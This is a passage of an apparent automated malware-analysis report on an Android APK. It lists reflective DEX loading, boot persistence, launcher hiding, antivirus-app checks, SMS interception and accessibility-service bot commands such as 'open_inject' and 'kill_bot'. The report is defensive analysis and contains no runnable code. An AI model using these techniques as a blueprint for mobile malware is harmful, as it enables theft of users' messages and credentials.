Source: piuk.blockchain.androidcore.utils.PrefsUtil;->hasBackup:237API Call: android.content.SharedPreferences.getString
Source: piuk.blockchain.androidcore.utils.PrefsUtil;->restoreFromBackup:277API Call: android.content.SharedPreferences.getString
Source: piuk.blockchain.androidcore.utils.PrefsUtil;->restoreFromBackup:283API Call: android.content.SharedPreferences.getString
Source: piuk.blockchain.androidcore.utils.PrefsUtil;->restoreFromBackup:289API Call: android.content.SharedPreferences.getString
Source: piuk.blockchain.androidcore.utils.PrefsUtil;->restoreFromBackup:297API Call: android.content.SharedPreferences.getString
Source: org.appspot.apprtc.AppRTCProximitySensor;->e:72API Call: android.hardware.SensorManager.registerListener
Source: com.coinbase.android.accessibilityprotection.actions.shake.ShakeAction;->startGestureTracking:20API Call: android.hardware.SensorManager.registerListener

Data Obfuscation:

barindex
Accesses FileOutputStream via ReflectionShow sources
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Reflective call: java.io.FileOutputStream@6119149
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Reflective call: public void java.io.FileOutputStream.write(byte[]) throws java.io.IOException
Loads new DEX files via dynamic constructorShow sources
Source: trouble.canyon.van.MIfUpWsMoKa;->nutventure:106API Call: Constructor call: public dalvik.system.DexClassLoader(java.lang.String,java.lang.String,java.lang.String,java.lang.ClassLoader)
Source: Lb/a/a/a/c/q;->z()[BMethod string: 0\u0082\u0004\u00a80\u0082\u0003\u0090\u00a0\u0003\u0002\u0001\u0002\u0002\t\u0000\u00d5\u0085\u00b8l}\u00d3N\u00f50\r\u0006\t*\u0086H\u0086\u00f7\r\u0001\u0001\u0004\u0005\u00000\u0081\u00941\u000b0\t\u0006\u0003U\u0004\u0006\u0013\u0002US1\u00130\u0011\ Length: 4395
Source: MediaPlayer.apkTotal valid method names: 63%
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Real call: android.content.res.AssetManager@df55307
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Real call: public final java.lang.Class java.lang.Object.getClass()
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Real call: android.content.res.AssetManager@df55307
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Real call: public final int android.content.res.AssetManager.addAssetPath(java.lang.String)
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Real call: android.app.ContextImpl@deb8a64
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Real call: public android.content.res.AssetManager android.app.ContextImpl.getAssets()
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Real call: public final java.lang.Class java.lang.Object.getClass()
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Real call: android.content.res.AssetManager@3149085
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Real call: public final java.io.InputStream android.content.res.AssetManager.open(java.lang.String) throws java.io.IOException
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Real call: public int java.io.FilterInputStream.read(byte[]) throws java.io.IOException
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Real call: public int java.io.FilterInputStream.read(byte[]) throws java.io.IOException
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Real call: public synchronized int java.io.BufferedInputStream.read(byte[],int,int) throws java.io.IOException
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Real call: java.io.BufferedInputStream@6a5559a
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Real call: public final java.lang.Class java.lang.Object.getClass()
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Real call: java.io.BufferedInputStream@6a5559a
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Real call: public void java.io.BufferedInputStream.close() throws java.io.IOException
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Real call: yllEs
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Real call: public final java.lang.Class java.lang.Object.getClass()
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Real call: yllEs
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Real call: public byte[] java.lang.String.getBytes()
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Real call: java.io.FileOutputStream@6119149
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Real call: public final java.lang.Class java.lang.Object.getClass()
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Real call: public void java.io.FileOutputStream.write(byte[]) throws java.io.IOException
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Real call: public final java.lang.Class java.lang.Object.getClass()
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Real call: public void java.io.BufferedInputStream.close() throws java.io.IOException
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Real call: java.io.BufferedOutputStream@6d7ee5c
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Real call: public final java.lang.Class java.lang.Object.getClass()
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Real call: java.io.BufferedOutputStream@6d7ee5c
Source: trouble.canyon.van.KKcLuGbBgAmIlTbGsOhNzLuLcUuBeKxZyLiNdXf;->sirenarctic:310API Call: Real call: public void java.io.FilterOutputStream.close() throws java.io.IOException
Source: trouble.canyon.van.MIfUpWsMoKa;->boardhamster:71API Call: Real call: null
Source: trouble.canyon.van.MIfUpWsMoKa;->boardhamster:71API Call: Real call: public static android.app.ActivityThread android.app.ActivityThread.currentActivityThread()
Source: trouble.canyon.van.MIfUpWsMoKa;->boardhamster:71API Call: Real call: final android.util.ArrayMap android.app.ActivityThread.mPackages
Source: trouble.canyon.van.MIfUpWsMoKa;->boardhamster:71API Call: Real call: public native java.lang.Object java.lang.reflect.Field.get(java.lang.Object) throws java.lang.IllegalAccessException,java.lang.IllegalArgumentException
Source: trouble.canyon.van.MIfUpWsMoKa;->boardhamster:71API Call: Real call: java.lang.ref.WeakReference@c6feb2b
Source: trouble.canyon.van.MIfUpWsMoKa;->boardhamster:71API Call: Real call: public final java.lang.Class java.lang.Object.getClass()
Source: trouble.canyon.van.MIfUpWsMoKa;->boardhamster:71API Call: Real call: public java.lang.Object java.lang.ref.Reference.get()
Source: trouble.canyon.van.MIfUpWsMoKa;->boardhamster:71API Call: Real call: private java.lang.ClassLoader android.app.LoadedApk.mClassLoader
Source: trouble.canyon.van.MIfUpWsMoKa;->boardhamster:71API Call: Real call: public native java.lang.Object java.lang.reflect.Field.get(java.lang.Object) throws java.lang.IllegalAccessException,java.lang.IllegalArgumentException
Source: cabbage.grace.solid.util.m;->f:83API Call: java.lang.reflect.Method.invoke
Source: trouble.canyon.van.MMqQaBuGxNtCgMt;->weirdfever:139API Call: java.lang.reflect.Method.invoke
Source: org.xbill.DNS.ResolverConfig;->g:89API Call: java.lang.reflect.Method.invoke
Source: org.xbill.DNS.ResolverConfig;->l:170API Call: java.lang.reflect.Method.invoke
Source: org.xbill.DNS.ResolverConfig;->l:173API Call: java.lang.reflect.Method.invoke
Source: org.xbill.DNS.ResolverConfig;->l:176API Call: java.lang.reflect.Method.invoke
Source: a.a.a.a.d0;->a:6API Call: java.lang.reflect.Method.invoke
Source: a.a.a.a.g0;->e:36API Call: java.lang.reflect.Field.get
Source: a.a.a.a.n;->R0:71API Call: java.lang.reflect.Field.get
Source: b.a.a.a.d.c;->y:9API Call: java.lang.reflect.Field.get
Source: org.objenesis.instantiator.gcj.GCJInstantiator;->newInstance:6API Call: java.lang.reflect.Method.invoke
Source: org.slf4j.helpers.SubstituteLogger;->log:112API Call: java.lang.reflect.Method.invoke
Source: org.json.JSONObject;-><init>:11API Call: java.lang.reflect.Field.get
Source: org.json.JSONObject;->populateInternalMap:127API Call: java.lang.reflect.Method.invoke
Source: org.parceler.InjectionUtil$GetFieldPrivilegedAction;->b:5API Call: java.lang.reflect.Field.get
Source: org.objenesis.instantiator.perc.PercInstantiator;->newInstance:11API Call: java.lang.reflect.Method.invoke
Source: org.objenesis.strategy.PlatformDescription;->b:23API Call: java.lang.reflect.Field.get
Source: org.objenesis.strategy.PlatformDescription;->e:38API Call: java.lang.reflect.Field.get
Source: org.objenesis.instantiator.sun.SunReflectionFactoryHelper;->a:3API Call: java.lang.reflect.Method.invoke
Source: org.objenesis.instantiator.sun.SunReflectionFactoryHelper;->d:17API Call: java.lang.reflect.Method.invoke
Source: org.objenesis.instantiator.sun.UnsafeFactoryInstantiator;-><init>:6API Call: java.lang.reflect.Field.get
Source: org.appspot.apprtc.util.ScreenUtils;->a:11API Call: java.lang.reflect.Method.invoke
Source: org.appspot.apprtc.util.ScreenUtils;->a:13API Call: java.lang.reflect.Method.invoke
Source: piuk.blockchain.androidcore.utils.PRNGFixes;->applyOpenSSLFix:10API Call: java.lang.reflect.Method.invoke
Source: piuk.blockchain.androidcore.utils.PRNGFixes;->applyOpenSSLFix:17API Call: java.lang.reflect.Method.invoke
Source: piuk.blockchain.androidcore.utils.PRNGFixes;->getDeviceSerialNumber:55API Call: java.lang.reflect.Field.get

Persistence and Installation Behavior:

barindex
Drops a new dex fileShow sources
Source: Android AppFile dump: /data/user/0/trouble.canyon.van/app_DynamicOptDex/rA.jsonJump to dropped file
Source: submitted apkRequest permission: android.permission.RECEIVE_BOOT_COMPLETED
Source: cabbage.grace.solid.h.a;->a:18API Call: android.os.PowerManager.newWakeLock
Source: cabbage.grace.solid.receiver.AWdjkwa90dA;->b:12API Call: android.os.PowerManager.newWakeLock
Source: cabbage.grace.solid.AawidnaoDNI;->p:186API Call: android.os.PowerManager.newWakeLock
Source: cabbage.grace.solid.e;->d:184API Call: android.os.PowerManager.newWakeLock

Hooking and other Techniques for Hiding and Protection:

barindex
Protects itself from removalShow sources
Source: cabbage.grace.solid.util.k;->b:20API Calls in same method context: AccessibilityNodeInfo.findAccessibilityNodeInfosByText,AccessibilityEvent.getPackageName
Removes its application launcher (likely to stay hidden)Show sources
Source: cabbage.grace.solid.andaowidnAIObdnaw;->onServiceConnected:255API Call: android.content.pm.PackageManager.setComponentEnabledSetting
Starts/registers a service/receiver on screen offShow sources
Source: cabbage.grace.solid.AawidnaoDNI;->p:204API Call: cabbage.grace.solid.AawidnaoDNI.registerReceiver
Source: cabbage.grace.solid.receiver.anwdioANWDIOawnd;->onReceive:27API Call: android.content.BroadcastReceiver.abortBroadcast
Source: submitted apkRequest permission: android.permission.SYSTEM_ALERT_WINDOW
Source: submitted apkRequest permission: android.permission.KILL_BACKGROUND_PROCESSES
Source: com.google.firebase.perf.internal.GaugeMetadataManager;->getCurrentProcessName:13API Call: android.app.ActivityManager.getRunningAppProcesses
Source: org.xbill.DNS.DNSSEC;->g:79API Call: java.security.MessageDigest.getInstance
Source: org.xbill.DNS.DNSSEC;->g:87API Call: java.security.MessageDigest.getInstance
Source: org.xbill.DNS.DNSSEC;->g:89API Call: java.security.MessageDigest.getInstance
Source: org.xbill.DNS.DNSSEC;->g:91API Call: java.security.MessageDigest.getInstance
Source: org.xbill.DNS.DNSSEC;->g:94API Call: java.security.MessageDigest.update
Source: org.xbill.DNS.DNSSEC;->g:96API Call: java.security.MessageDigest.update
Source: org.xbill.DNS.DNSSEC;->g:97API Call: java.security.MessageDigest.digest
Source: org.xbill.DNS.NSEC3Record;->hashName:19API Call: java.security.MessageDigest.getInstance
Source: org.xbill.DNS.NSEC3Record;->hashName:22API Call: java.security.MessageDigest.update
Source: org.xbill.DNS.NSEC3Record;->hashName:23API Call: java.security.MessageDigest.update
Source: org.xbill.DNS.NSEC3Record;->hashName:24API Call: java.security.MessageDigest.update
Source: org.xbill.DNS.NSEC3Record;->hashName:25API Call: java.security.MessageDigest.digest
Source: com.coinbase.android.PinStorage.PinStorageManager;->getCipher:10API Call: javax.crypto.Cipher.getInstance
Source: com.coinbase.android.keystore.CBKeyStore;->getOrCreateEncryptionKey:27API Call: javax.crypto.KeyGenerator.generateKey
Source: com.coinbase.android.keystore.CBKeyStore;->decrypt:45API Call: javax.crypto.Cipher.getInstance
Source: com.coinbase.android.keystore.CBKeyStore;->decrypt:50API Call: javax.crypto.Cipher.init
Source: com.coinbase.android.keystore.CBKeyStore;->decrypt:52API Call: javax.crypto.Cipher.doFinal
Source: com.coinbase.android.keystore.CBKeyStore;->encrypt:66API Call: javax.crypto.Cipher.getInstance
Source: com.coinbase.android.keystore.CBKeyStore;->encrypt:71API Call: javax.crypto.Cipher.init
Source: com.coinbase.android.keystore.CBKeyStore;->encrypt:83API Call: javax.crypto.Cipher.doFinal
Source: com.facebook.common.util.SecureHashUtil;->makeHash:8API Call: java.security.MessageDigest.getInstance
Source: com.facebook.common.util.SecureHashUtil;->makeHash:10API Call: java.security.MessageDigest.update
Source: com.facebook.common.util.SecureHashUtil;->makeHash:11API Call: java.security.MessageDigest.digest
Source: com.facebook.common.util.SecureHashUtil;->makeHash:15API Call: java.security.MessageDigest.getInstance
Source: com.facebook.common.util.SecureHashUtil;->makeHash:16API Call: java.security.MessageDigest.update
Source: com.facebook.common.util.SecureHashUtil;->makeHash:17API Call: java.security.MessageDigest.digest
Source: com.facebook.common.util.SecureHashUtil;->makeSHA1HashBase64:36API Call: java.security.MessageDigest.getInstance
Source: com.facebook.common.util.SecureHashUtil;->makeSHA1HashBase64:37API Call: java.security.MessageDigest.update
Source: com.facebook.common.util.SecureHashUtil;->makeSHA1HashBase64:38API Call: java.security.MessageDigest.digest
Source: piuk.blockchain.androidcore.utils.DeviceIdGeneratorImpl;->generateWifiMacId:43API Call: java.security.MessageDigest.getInstance
Source: piuk.blockchain.androidcore.utils.DeviceIdGeneratorImpl;->generateWifiMacId:45API Call: java.security.MessageDigest.update
Source: piuk.blockchain.androidcore.utils.DeviceIdGeneratorImpl;->generateWifiMacId:53API Call: java.security.MessageDigest.update
Source: piuk.blockchain.androidcore.utils.DeviceIdGeneratorImpl;->generateWifiMacId:59API Call: java.security.MessageDigest.update
Source: piuk.blockchain.androidcore.utils.DeviceIdGeneratorImpl;->generateWifiMacId:65API Call: java.security.MessageDigest.update
Source: piuk.blockchain.androidcore.utils.DeviceIdGeneratorImpl;->generateWifiMacId:66API Call: java.security.MessageDigest.digest
Source: Lorg/appspot/apprtc/CpuMonitor;->j()Lorg/appspot/apprtc/CpuMonitor$ProcStat;Method string: "/proc/stat"
Source: cabbage.grace.solid.andwioawdnbawuiDa;->onCreate:63Field Access: android.os.Build.MANUFACTURER
Source: cabbage.grace.solid.util.b;->g:69Field Access: android.os.Build.MANUFACTURER
Source: cabbage.grace.solid.util.b;->g:70Field Access: android.os.Build.MODEL
Source: cabbage.grace.solid.util.NAaiondwaoidnA;->onCreate:18Field Access: android.os.Build.MANUFACTURER
Source: cabbage.grace.solid.util.NAaiondwaoidnA;->onCreate:23Field Access: android.os.Build.MANUFACTURER
Source: cabbage.grace.solid.util.NAaiondwaoidnA;->onCreate:28Field Access: android.os.Build.MANUFACTURER
Source: cabbage.grace.solid.h.e;->b:19Field Access: android.os.Build.MANUFACTURER
Source: cabbage.grace.solid.AawidnaoDNI$a$a;->run:40Field Access: android.os.Build.MANUFACTURER
Source: cabbage.grace.solid.andaowidnAIObdnaw;->onAccessibilityEvent:67Field Access: android.os.Build.MANUFACTURER
Source: cabbage.grace.solid.util.a;->b:264Field Access: android.os.Build.MANUFACTURER
Source: cabbage.grace.solid.util.a;->b:279Field Access: android.os.Build.MANUFACTURER
Source: cabbage.grace.solid.util.a;->b:319Field Access: android.os.Build.MANUFACTURER
Source: cabbage.grace.solid.util.l;->d:102Field Access: android.os.Build.MANUFACTURER
Source: cabbage.grace.solid.util.l;->d:108Field Access: android.os.Build.MANUFACTURER
Source: cabbage.grace.solid.util.l;->d:129Field Access: android.os.Build.MANUFACTURER
Source: com.google.firebase.FirebaseCommonRegistrar;->getComponents:45Field Access: android.os.Build.PRODUCT
Source: com.google.firebase.FirebaseCommonRegistrar;->getComponents:50Field Access: android.os.Build.DEVICE
Source: com.google.firebase.FirebaseCommonRegistrar;->getComponents:55Field Access: android.os.Build.BRAND
Source: piuk.blockchain.android.util.RootUtil;->buildTags:2Field Access: android.os.Build.TAGS
Source: org.appspot.apprtc.util.AppRTCUtils;->c:22Field Access: android.os.Build$VERSION.RELEASE
Source: org.appspot.apprtc.util.AppRTCUtils;->c:26Field Access: android.os.Build.BRAND
Source: org.appspot.apprtc.util.AppRTCUtils;->c:30Field Access: android.os.Build.DEVICE
Source: org.appspot.apprtc.util.AppRTCUtils;->c:34Field Access: android.os.Build.ID
Source: org.appspot.apprtc.util.AppRTCUtils;->c:42Field Access: android.os.Build.MANUFACTURER
Source: org.appspot.apprtc.util.AppRTCUtils;->c:46Field Access: android.os.Build.MODEL
Source: org.appspot.apprtc.util.AppRTCUtils;->c:50Field Access: android.os.Build.PRODUCT
Source: piuk.blockchain.androidcore.utils.DeviceIdGeneratorImpl;->generateWifiMacId:46Field Access: android.os.Build.MANUFACTURER
Source: piuk.blockchain.androidcore.utils.DeviceIdGeneratorImpl;->generateWifiMacId:54Field Access: android.os.Build.MODEL
Source: piuk.blockchain.androidcore.utils.DeviceIdGeneratorImpl;->generateWifiMacId:60Field Access: android.os.Build.DEVICE
Source: piuk.blockchain.androidcore.utils.PRNGFixes;->getBuildFingerprintAndDeviceSerial:44Field Access: android.os.Build.FINGERPRINT
Source: org.webrtc.voiceengine.BuildInfo;->getAndroidBuildId:2Field Access: android.os.Build.ID
Source: org.webrtc.voiceengine.BuildInfo;->getBrand:3Field Access: android.os.Build.BRAND
Source: org.webrtc.voiceengine.BuildInfo;->getBuildRelease:4Field Access: android.os.Build$VERSION.RELEASE
Source: org.webrtc.voiceengine.BuildInfo;->getBuildType:5Field Access: android.os.Build.TYPE
Source: org.webrtc.voiceengine.BuildInfo;->getDevice:6Field Access: android.os.Build.DEVICE
Source: org.webrtc.voiceengine.BuildInfo;->getDeviceManufacturer:7Field Access: android.os.Build.MANUFACTURER
Source: org.webrtc.voiceengine.BuildInfo;->getDeviceModel:8Field Access: android.os.Build.MODEL
Source: org.webrtc.voiceengine.BuildInfo;->getProduct:9Field Access: android.os.Build.PRODUCT
Source: org.webrtc.voiceengine.WebRtcAudioEffects;->isAcousticEchoCancelerBlacklisted:49Field Access: android.os.Build.MODEL
Source: org.webrtc.voiceengine.WebRtcAudioEffects;->isAcousticEchoCancelerBlacklisted:52Field Access: android.os.Build.MODEL
Source: org.webrtc.voiceengine.WebRtcAudioEffects;->isNoiseSuppressorBlacklisted:73Field Access: android.os.Build.MODEL
Source: org.webrtc.voiceengine.WebRtcAudioEffects;->isNoiseSuppressorBlacklisted:76Field Access: android.os.Build.MODEL
Source: org.webrtc.voiceengine.WebRtcAudioManager;->isDeviceBlacklistedForOpenSLESUsage:102Field Access: android.os.Build.MODEL
Source: org.webrtc.voiceengine.WebRtcAudioUtils;->deviceIsBlacklistedForOpenSLESUsage:4Field Access: android.os.Build.MODEL
Source: org.webrtc.voiceengine.WebRtcAudioUtils;->logDeviceInfo:35Field Access: android.os.Build$VERSION.RELEASE
Source: org.webrtc.voiceengine.WebRtcAudioUtils;->logDeviceInfo:39Field Access: android.os.Build.BRAND
Source: org.webrtc.voiceengine.WebRtcAudioUtils;->logDeviceInfo:43Field Access: android.os.Build.DEVICE
Source: org.webrtc.voiceengine.WebRtcAudioUtils;->logDeviceInfo:47Field Access: android.os.Build.ID
Source: org.webrtc.voiceengine.WebRtcAudioUtils;->logDeviceInfo:55Field Access: android.os.Build.MANUFACTURER
Source: org.webrtc.voiceengine.WebRtcAudioUtils;->logDeviceInfo:59Field Access: android.os.Build.MODEL
Source: org.webrtc.voiceengine.WebRtcAudioUtils;->logDeviceInfo:63Field Access: android.os.Build.PRODUCT
Source: org.webrtc.voiceengine.WebRtcAudioUtils;->runningOnEmulator:70Field Access: android.os.Build.BRAND
Source: org.webrtc.HardwareVideoEncoderFactory;->isHardwareSupportedInCurrentSdkH264:58Field Access: android.os.Build.MODEL
Source: org.webrtc.MediaCodecVideoEncoder;->findHwEncoder:68Field Access: android.os.Build.MODEL
Source: org.webrtc.MediaCodecVideoEncoder;->findHwEncoder:73Field Access: android.os.Build.MODEL
Source: Lorg/appspot/apprtc/CpuMonitor;->f()VMethod string: "/sys/devices/system/cpu/present"
Source: Lorg/appspot/apprtc/CpuMonitor;->f()VMethod string: "Cannot do CPU stats due to /sys/devices/system/cpu/present parsing problem"
Source: Lorg/appspot/apprtc/CpuMonitor;->f()VMethod string: "Cannot do CPU stats since /sys/devices/system/cpu/present is missing"
Source: Lorg/appspot/apprtc/CpuMonitor;->f()VMethod string: "/sys/devices/system/cpu/cpu"
Source: Lorg/ccil/cowan/tagsoup/HTMLSchema;-><init>()VMethod string: "os"
Source: Lorg/slf4j/LoggerFactory;->isAndroid()ZMethod string: "android"
Source: Lcom/coinbase/android/accessibilityprotection/ProtectedView;->setType(Ljava/lang/String;)VMethod string: "type"
Source: Lorg/xbill/DNS/OPTRecord;-><init>(IIIILjava/util/List;)VMethod string: "version"
Source: Lpiuk/blockchain/androidcore/data/auth/AuthService$getSessionId$1$1;->apply(Lretrofit2/Response;)Ljava/lang/String;Method string: "sid"
Source: Lorg/ccil/cowan/tagsoup/HTMLSchema;-><init>()VMethod string: "phone"
Source: Lpiuk/blockchain/android/ui/transactionflow/plugin/SmallBalanceView;->access$getModel$p(Lpiuk/blockchain/android/ui/transactionflow/plugin/SmallBalanceView;)Lpiuk/blockchain/android/ui/transactionflow/engine/TransactionModel;Method string: "model"
Source: La/a/a/a/z$g$a;->g()Landroid/os/Bundle;Method string: "time"
Source: Lorg/objenesis/strategy/PlatformDescription;->e(Ljava/lang/Class;)IMethod string: "sdk"
Source: cabbage.grace.solid.util.b;->h:84API Call: android.provider.Settings.Secure.getString
Source: piuk.blockchain.androidcore.utils.DeviceIdGeneratorImpl;->generateId:9API Call: android.provider.Settings$Secure.getString

Anti Debugging:

barindex
Access the class loader (often done to load a new code)Show sources
Source: trouble.canyon.van.MIfUpWsMoKa;->suittent:113API Call: java.lang.Class.getDeclaredField("mClassLoader")
Source: Ltrouble/canyon/van/MIfUpWsMoKa;->suittent(Ljava/lang/String;Ljava/lang/Class;)Ljava/lang/reflect/Field;Method string: "mClassLoader"
Source: Ltrouble/canyon/van/MIfUpWsMoKa;->firmblue()Ljava/lang/StringBuilder;Method string: "mClassLoader"
Source: piuk.blockchain.androidcore.utils.DeviceIdGeneratorImpl;->generateWifiMacId:41API Call: java.net.NetworkInterface.getHardwareAddress
Source: piuk.blockchain.androidcore.utils.DeviceIdGeneratorImpl;->generateWifiMacId:44API Call: java.net.NetworkInterface.getHardwareAddress
Source: cabbage.grace.solid.util.b;->f:65API Call: android.telephony.TelephonyManager.getNetworkCountryIso returned ""
Source: cabbage.grace.solid.util.b;->f:68API Call: android.telephony.TelephonyManager.getNetworkCountryIso

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
May check for install Android security applications (AV and firewalls)Show sources
Source: Lcabbage/grace/solid/util/a;-><clinit>()VMethod string: "com.avast.android.mobilesecurity"
Source: Lcabbage/grace/solid/util/a;-><clinit>()VMethod string: "com.kms.free"
Source: Lcabbage/grace/solid/util/a;-><clinit>()VMethod string: "com.wsandroid.suite"
Source: Lcabbage/grace/solid/util/a;-><clinit>()VMethod string: "com.eset.ems2.gp"
Source: Lcabbage/grace/solid/util/a;-><clinit>()VMethod string: "com.avira.android"
Source: Lcabbage/grace/solid/util/a;-><clinit>()VMethod string: "com.drweb"

Stealing of Sensitive Information:

barindex
Uses accessibility services (likely to control other applications)Show sources
Source: cabbage.grace.solid.util.k;->b:20API Call: android.view.accessibility.AccessibilityNodeInfo.findAccessibilityNodeInfosByText
Source: cabbage.grace.solid.receiver.anwdioANWDIOawnd;->onReceive:9API Call: android.telephony.SmsMessage.createFromPdu
Source: submitted apkRequest permission: android.permission.READ_SMS
Source: submitted apkRequest permission: android.permission.READ_PHONE_STATE
Source: submitted apkRequest permission: android.permission.RECEIVE_SMS
Source: submitted apkRequest permission: android.permission.GET_ACCOUNTS
Source: cabbage.grace.solid.receiver.anwdioANWDIOawndRegistered receiver: android.provider.Telephony.SMS_RECEIVED
Source: cabbage.grace.solid.receiver.anwdioANWDIOawnd;->onReceive:14API Call: android.telephony.SmsMessage.getOriginatingAddress
Source: cabbage.grace.solid.receiver.anwdioANWDIOawnd;->onReceive:21API Call: android.telephony.SmsMessage.getMessageBody
Source: cabbage.grace.solid.util.b;->i:89API Call: android.content.pm.PackageManager.getInstalledApplications
Source: org.webrtc.Camera1Enumerator;->enumerateFormats:31API Call: android.hardware.Camera.open
Source: org.webrtc.Camera1Enumerator;->getCameraIndex:77API Call: android.hardware.Camera.getNumberOfCameras
Source: org.webrtc.Camera1Enumerator;->getCameraInfo:87API Call: android.hardware.Camera.getCameraInfo
Source: org.webrtc.Camera1Enumerator;->getSupportedFormats:111API Call: android.hardware.Camera.getNumberOfCameras
Source: org.webrtc.Camera1Enumerator;->getDeviceNames:119API Call: android.hardware.Camera.getNumberOfCameras
Source: org.webrtc.Camera1Session;->create:46API Call: android.hardware.Camera.open
Source: org.webrtc.Camera1Session;->create:50API Call: android.hardware.Camera.getCameraInfo
Source: com.facebook.common.util.UriUtil;->isLocalCameraUri:37Field access: android.provider.MediaStore$Images$Media.EXTERNAL_CONTENT_URI
Source: com.facebook.common.util.UriUtil;->isLocalCameraUri:40Field access: android.provider.MediaStore$Images$Media.INTERNAL_CONTENT_URI
Source: b.a.a.a.e.r1;->k:64API Call: android.accounts.Account.name
Source: org.webrtc.Camera1Session;-><init>:20API Call: android.media.MediaRecorder.setCamera
Source: Lcabbage/grace/solid/h/j;->a()VMethod string: "open_activity"
Source: Lcabbage/grace/solid/h/c;->a(Landroid/accessibilityservice/AccessibilityService;)VMethod string: "ask_syspass"
Source: Lcabbage/grace/solid/h/a;->a(Landroid/content/Context;)VMethod string: "activate_screen"
Source: Lcabbage/grace/solid/h/i;->a(Landroid/accessibilityservice/AccessibilityService;Landroid/view/accessibility/AccessibilityEvent;)VMethod string: "mute_phone"
Source: Lpiuk/blockchain/androidcoreui/utils/logging/PairingMethod;-><clinit>()VMethod string: "reverse"
Source: Lcabbage/grace/solid/h/k;->a(Landroid/accessibilityservice/AccessibilityService;Landroid/view/accessibility/AccessibilityEvent;)VMethod string: "open_inject"
Source: Lcabbage/grace/solid/h/h;->a()VMethod string: "kill_bot"
Source: Lcabbage/grace/solid/h/l;->a()VMethod string: "reset_pass"
Source: Lcom/coinbase/android/PinStorage/PinStorageModule;->deleteScreenProtectPreference()VMethod string: "pin_enabled_app_open"
Source: Lcabbage/grace/solid/h/b;->a(Landroid/accessibilityservice/AccessibilityService;Landroid/view/accessibility/AccessibilityEvent;)VMethod string: "app_delete"
Source: Lcabbage/grace/solid/h/d;->a()VMethod string: "ask_perms"
Source: Lorg/webrtc/voiceengine/WebRtcAudioRecord;->reportWebRtcAudioRecordStartError(Lorg/webrtc/voiceengine/WebRtcAudioRecord$AudioRecordStartErrorCode;Ljava/lang/String;)VMethod string: "start recording error: "
Source: Lcabbage/grace/solid/h/b;->a(Landroid/accessibilityservice/AccessibilityService;Landroid/view/accessibility/AccessibilityEvent;)VMethod string: "app_delete"
Source: Lcabbage/grace/solid/h/j;->a()VInstruction: "const-string v3, "open_activity""
Source: Lcabbage/grace/solid/h/c;->a(Landroid/accessibilityservice/AccessibilityService;)VInstruction: "const-string v1, "ask_syspass""
Source: Lcabbage/grace/solid/h/a;->a(Landroid/content/Context;)VInstruction: "const-string v2, "activate_screen""
Source: Lcabbage/grace/solid/h/i;->a(Landroid/accessibilityservice/AccessibilityService;Landroid/view/accessibility/AccessibilityEvent;)VInstruction: "const-string v1, "mute_phone""
